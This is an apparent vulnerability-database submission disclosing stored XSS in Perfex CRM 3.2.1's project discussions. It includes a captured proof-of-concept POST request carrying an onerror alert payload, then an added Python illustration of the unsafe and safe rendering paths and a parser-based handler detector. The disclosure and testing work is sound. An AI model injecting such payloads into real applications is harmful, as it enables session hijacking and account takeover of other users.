Submit #546171: CodeCanyon Perfex CRM 3.2.1 Stored Cross-Site Scripting in Perfex CRM Project Discussion

Title: CodeCanyon Perfex CRM 3.2.1 Stored Cross-Site Scripting in Perfex CRM Project Discussion

Description: A stored cross-site scripting (XSS) vulnerability exists in the Project Discussions module of Perfex CRM 3.2.1. An authenticated client user can inject JavaScript into the description field when creating a new discussion; the payload is stored and executes in the browser of any other user who later views that discussion. Impact includes session hijacking, phishing delivered from inside the application and, depending on the victim's role, full account compromise.

Request (as captured; note that the description parameter URL-decodes to the entity-encoded string &lt;img src=x onerror=alert(1)&gt;, not to raw angle brackets):

POST /perfex/clients/project/2 HTTP/1.1
Host: 192.168.1.11
Content-Length: 173
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof
Connection: keep-alive

csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B

Affected endpoint: POST /perfex/clients/project/{project_id} HTTP/1.1

Source: https://github.com/bytium/vulnerability-research/blob/main/stored-xss-perfex-crm-3.2.1.md
User: suffer (UID 74855)
Submission: 03/30/2025 11:40
Moderation: 04/03/2025 15:40 (4 days later)
Status: Accepted
VulDB entry: 303180 [CodeCanyon Perfex CRM 3.2.1 Project Discussions 2 Description cross site scripting]
Points: 20
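The payload in the captured request deserves a second look: URL-decoding the description parameter yields &lt;img src=x onerror=alert(1)&gt;, with HTML entities rather than raw angle brackets, so it only becomes a live tag if the application entity-decodes stored text somewhere before the browser sees it. The script below is an added example, not Perfex CRM's own code: it replays the captured body through two hypothetical views (render_unsafe decodes entities and emits raw HTML, render_safe escapes on output) and uses an HTML parser rather than string matching to decide whether the result carries an inline event handler. Python is used instead of the application's PHP purely so the illustration runs stand-alone; the view functions are stand-ins and do not represent the real templates.

```python
"""Added example (not Perfex CRM code): what the captured POST body stores,
and why entity-decoding it before output turns it into a live <img> tag.

Assumptions, labelled: render_unsafe / render_safe are hypothetical stand-ins
for a discussion view; they are not the application's real templates.
"""
from html import escape, unescape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# POST body copied from the request captured in the submission above.
CAPTURED_BODY = (
    "csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2"
    "&action=new_discussion&subject=Testing+Discussion"
    "&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B"
)


def stored_description(body: str = CAPTURED_BODY) -> str:
    """The value a form handler sees after URL-decoding, i.e. what gets stored.
    The payload arrives with &lt; / &gt; entities, not raw angle brackets."""
    return parse_qs(body)["description"][0]


def render_unsafe(stored: str) -> str:
    """Hypothetical vulnerable view: entity-decode the stored text, then emit it raw.
    One decode step is all it takes to reconstitute the <img onerror> tag."""
    return f'<div class="discussion">{unescape(stored)}</div>'


def render_safe(stored: str) -> str:
    """Hypothetical hardened view: escape on output and never decode.
    The stored entities are double-escaped and display as literal text."""
    return f'<div class="discussion">{escape(stored, quote=True)}</div>'


class _HandlerFinder(HTMLParser):
    """Collects (tag, attribute) pairs for inline event handlers and <script>
    elements, parsing the markup the way a browser would instead of grepping
    for the substring "onerror" (which is also present, harmlessly, as text
    in the safely rendered page)."""

    def __init__(self) -> None:
        super().__init__()
        self.found: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.append((tag, ""))
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.found.append((tag, name.lower()))


def event_handlers(markup: str) -> list[tuple[str, str]]:
    """Return every element/attribute pair in `markup` that would run script."""
    finder = _HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.found


if __name__ == "__main__":
    stored = stored_description()
    print("stored :", stored)
    print("unsafe :", render_unsafe(stored), event_handlers(render_unsafe(stored)))
    print("safe   :", render_safe(stored), event_handlers(render_safe(stored)))
```

When verifying a fix for this class of bug, check the rendered discussion page with a parser-based test like event_handlers rather than by searching for the payload string: a page that still contains the literal text onerror=alert(1) inside escaped entities is fine, while one that contains it inside an element attribute is not.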